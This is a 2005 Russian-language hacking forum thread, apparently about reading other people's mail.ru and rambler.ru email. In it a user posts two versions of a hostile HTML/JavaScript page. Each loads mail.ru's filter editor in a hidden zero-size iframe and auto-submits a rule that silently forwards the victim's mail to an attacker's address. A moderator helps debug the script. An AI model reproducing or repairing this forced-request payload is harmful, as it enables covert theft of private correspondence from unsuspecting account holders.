чтение почты на mail.ru и rambler.ru

Discussion in 'Уязвимости Mail-сервисов' started by 4e/\, 16 Apr 2005.

  1. Ejivica

    Ejivica New Member

    Joined:
    8 Jun 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ага узнавала, читала... а толку мало... ну и что что я узнала, что это такое. Я же не могу это использовать так, как мне нужно! :(((
     
  2. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Ребя хватит флеймить в теме, создавайте новые топики по отдельным вопросам, а то буду удалять, мне пофиг, я модератор
     
  3. mra214

    mra214 New Member

    Joined:
    11 Jun 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    При загрузке страницы в <iframe src="http://win.mail.ru/cgi-bin/editfilter"> она открывается, если ссылка на страницу с этим ифрейм была запущена прям с почты - у меня во всяком случаи она всегда туды загружается...
    Но скрипт который я пробовал написать почему-то не пашет, хотя в оффлайн у меня все работает :confused: .Может кто найдет где я ошибся...
    Вот и сам скрипт:

    Code:
    <html>
         <head><title>}{@|&lt;e® &nbsp;&nbsp;&nbsp; ;-)</title></head>
    <script language="JavaScript">
    function hackit() {
    
    editf.document.Compose.Size.value="10000"
    editf.document.Compose.Action[2].checked=true;
    editf.document.Compose.Forward.value="[email protected]";
    editf.document.Compose.KeepMail[1].checked=true;
    editf.document.Compose.submit();
    
    }
    </script>
    <body>
    <iframe width=0 height=0 src="http://win.mail.ru/cgi-bin/editfilter" name="editf" onLoad='hackit()' ></iframe>
    </body>
    
    
    </html>
     
  4. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    что-то непонятно зачем фрейм создавать, если можно форму перенести просто
     
  5. mra214

    mra214 New Member

    Joined:
    11 Jun 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    JazzzSummerMan
    А по подробней...
    А если именно в таком виде, то в чем ошибка?
    Почему в оффлайн работает все? а в онлайн, при загрузке страницы в ифрейм, нет?
     
  6. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Так, понял о чем ты.. Значит форму бесполезно переносить на страницу, потому что реферер проверяется. А что именно не получается у тебя в онлайне? Ошибка доступа к элементам фрейма?
     
  7. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    скрипт надо имхо заносить в onLoad твоего фрейма, тогда заработает
     
  8. mra214

    mra214 New Member

    Joined:
    11 Jun 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Дело в том, что я не знаю в чем это ошибка заключается...
    Но наврятле в элементах фрейма - ведь в оффлайн не выдает ошибки...а точнее при выполнении скрипта в оффлайн, доступ к элементам фрейа осуществляются и вроде все работает, но в строке статуса написано: Done, but with erors.
     
  9. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    скрипт сразу выполняется, а содержимое страницы фильтров еще не загружено, поэтому и ошибка. Сделай так <iframe src="............../editfilter" OnLoad="javascript.......">
     
  10. mra214

    mra214 New Member

    Joined:
    11 Jun 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Мне что весь скрипт поместить в onLoad?
    Напиши по подробней...
     
  11. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    "скрипт надо имхо заносить в onLoad твоего фрейма, тогда заработает"
    "Сделай так <iframe src="............../editfilter" OnLoad="javascript.......">"
    два раза уже написал,к уда подробнее
     
  12. mra214

    mra214 New Member

    Joined:
    11 Jun 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Sorry.Не заметил... Сейчас попробую.
    Хотя не понимаю почему это скрипт раньше выполянется....
     
  13. mra214

    mra214 New Member

    Joined:
    11 Jun 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Опять та же история...
    При вставке следущего скрипта:
    Code:
    <html>
         <head><title>}{@|&lt;e® &nbsp;&nbsp;&nbsp; ;-)</title></head>
    
    <body>
    <iframe width=0 height=0 src="http://win.mail.ru/cgi-bin/editfilter" name="editf"  onLoad="JavaScript:editf.document.Compose.Size.value='10000';
    editf.document.Compose.Action[2].checked=true;
    editf.document.Compose.Forward.value='[email protected]';
    editf.document.Compose.KeepMail[1].checked=true;
    editf.document.Compose.submit();" ></iframe>
    </body>
    
    
    </html>
    :confused:
     
  14. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Здесь уже дело техники. Скрипт надо немного переработать. У тебя вон зачем-то перенос строк идет и все такое